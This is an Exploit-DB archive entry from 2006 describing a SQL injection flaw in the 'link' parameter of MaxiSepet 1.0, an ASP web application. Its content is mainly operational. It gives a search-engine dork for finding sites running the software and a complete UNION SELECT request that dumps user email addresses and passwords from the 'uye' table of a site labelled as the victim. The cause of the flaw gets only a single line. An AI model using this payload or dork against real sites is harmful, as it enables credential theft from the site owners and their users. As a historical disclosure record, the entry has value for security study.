MaxiSepet <= 1.0 link SQL Injection Vulnerability

2006-06-11T00:00:00
ID EDB-ID:1900
Type exploitdb
Reporter nukedx
Modified 2006-06-11T00:00:00

Description

MaxiSepet <= 1.0 (link) SQL Injection Vulnerability. Webapps exploit for asp platform

                                        
                                            #Method found by nukedx
#Contacts &gt; ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=42
#Title: MaxiSepet &lt;= 1.0 (link) SQL Injection Vulnerability.

#Dork: "Copyright MaxiSepet ©"

#How: Parameter link did not sanitized properly.

#Example: GET -&gt; http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL

#Example: GET -&gt; http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20&lt;b&gt;',email,'&lt;/b&gt;&lt;br&gt;','Þifre:%20&lt;b&gt;',sifre,'&lt;/b&gt;')+from+uye+ORDER BY email ASC

# nukedx.com [2006-06-11]

# milw0rm.com [2006-06-11]